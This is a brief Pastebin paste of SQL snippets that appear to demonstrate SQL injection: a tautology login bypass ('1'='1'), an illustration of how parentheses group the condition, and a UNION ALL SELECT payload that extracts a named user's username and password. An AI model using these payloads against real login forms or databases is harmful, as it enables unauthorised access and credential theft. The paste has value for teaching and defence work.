Advertisement
Guest User

Untitled

a guest
Oct 18th, 2016
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. select * from table
  2. where username='anything' and pw='1' or '1'='1'
  3.  
  4. select * from table
  5. where (username='anything' and pw='1') or '1'='1'
  6.  
  7. select * from table
  8. where username='user' and password='pass'
  9.  
  10. ' UNION ALL SELECT username,password from users where username='ShihabSoft' --
  11.  
  12. select * from users where username='' UNION ALL SELECT username,password from users where username='ShihabSoft' --
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement